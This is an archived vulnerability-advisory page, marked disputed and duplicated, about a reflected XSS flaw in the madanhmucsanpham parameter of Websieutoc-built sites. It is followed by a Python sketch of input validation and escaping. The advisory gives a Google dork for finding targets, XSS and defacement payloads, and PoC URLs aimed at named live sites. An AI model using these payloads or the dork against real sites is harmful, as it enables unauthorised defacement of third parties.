Disputed / BOGUS

Design by Websieutoc Cross Site Scripting Vulnerability

Published: 2015.12.29
Credit: Gray Hat Group
Risk: Low
CWE: CWE-79
CVE: N/A
Local: No
Remote: Yes
Dork: intext:"Thiết kế web, Quảng cáo google bởi DMV"

DUPLICATED
https://cxsecurity.com/issue/WLB-2015120294

########################################################
# Exploit Title: Design by Websieutoc Cross Site Scripting Vulnerability
########################################################
# Google Dork: intext:"Thiết kế web, Quảng cáo google bởi DMV"
# Date: [28/12/2015]
# Exploit Author: Gray Hat Group=>MR.BL4CK
# Vendor Homepage: [http://websieutoc.vn/]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
########################################################
# DESCRIPTION: Hello guys. First enter the dork in Google and open the target.
# Then, to test for this vulnerability, you must test scripts after the ID number.
# For example, these scripts:
# 1-[<script>alert('XSS')</script>]
# 2-["><marquee><h1>Hacked_By_MR.BL4CK_forum.gray-hg.ir</h1></marquee>]
# 3-[<marquee%20behavior="alternate">Hacked_By_MR.BL4CK<b>]
# Poc:
# http://thicongdien.com.vn/?madanhmucsanpham=2"><marquee><h1>Hacked_By_MR.BL4CK_forum.gray-hg.ir</h1></marquee>
# GooD LucK
########################################################
# Demo:
# http://thicongdien.com.vn/?madanhmucsanpham=2%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.diennongthontv.com/?madanhmucsanpham=19%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.cophankythuatdongphuong.com/?madanhmucsanpham=2%3Ch1%3ETest%3C/h1%3E
# http://nhuavosong.com/?madanhmucsanpham=11%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
########################################################
# Thanks to : Bl4ck W4rning | Dalghak | MR.BL4CK | WHITE | H!dden V!rus | Shayan 72 | Keian | Ahriman | MR.ROBOT
# We Are Gray Hat Hackers
# Discovered By:MR.BL4CK
########################################################
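
Defensive view of the flaw described in the note above, as an added example (not code from the original advisory or from the vendor): the PoC URLs show markup placed after the numeric id in the madanhmucsanpham parameter being reflected into the page. The sketch assumes the value lands inside an HTML attribute, as the `">` prefix in the PoC suggests; the host shop.example, the link template and all function names are hypothetical.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

PARAM = "madanhmucsanpham"          # parameter name taken from the PoC URLs
ID_RE = re.compile(r"[0-9]{1,9}")   # assumption: ids are short decimal integers

# Constructed sample requests (hypothetical host, harmless test markup).
GOOD_URL = "http://shop.example/?madanhmucsanpham=19"
BAD_URL = "http://shop.example/?madanhmucsanpham=2%22%3E%3Ch1%3ETest%3C/h1%3E"


def raw_param(url):
    """Percent-decoded parameter values, as a web framework would hand them over."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(PARAM, [])


def parse_category_id(url):
    """Return the id as int, or None unless exactly one all-digit value is present."""
    values = raw_param(url)
    if len(values) != 1 or not ID_RE.fullmatch(values[0]):
        return None
    return int(values[0])


def render_vulnerable(url):
    """'Before' (assumed template): raw value concatenated into an attribute."""
    value = (raw_param(url) or [""])[0]
    return '<a href="/?' + PARAM + "=" + value + '">category</a>'


def render_hardened(url):
    """'After': allow-list the id, then escape for the attribute context anyway."""
    cat_id = parse_category_id(url)
    if cat_id is None:
        return None  # caller should respond with HTTP 400
    return '<a href="/?' + PARAM + "=" + html.escape(str(cat_id), quote=True) + '">category</a>'


if __name__ == "__main__":
    for url in (GOOD_URL, BAD_URL):
        print("vulnerable:", render_vulnerable(url))
        print("hardened:  ", render_hardened(url))
```

Rejecting anything that is not a plain integer removes the injection point for this parameter; the escaping step stays in place so the template remains safe if the validation is ever relaxed.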



Copyright 2017, cxsecurity.com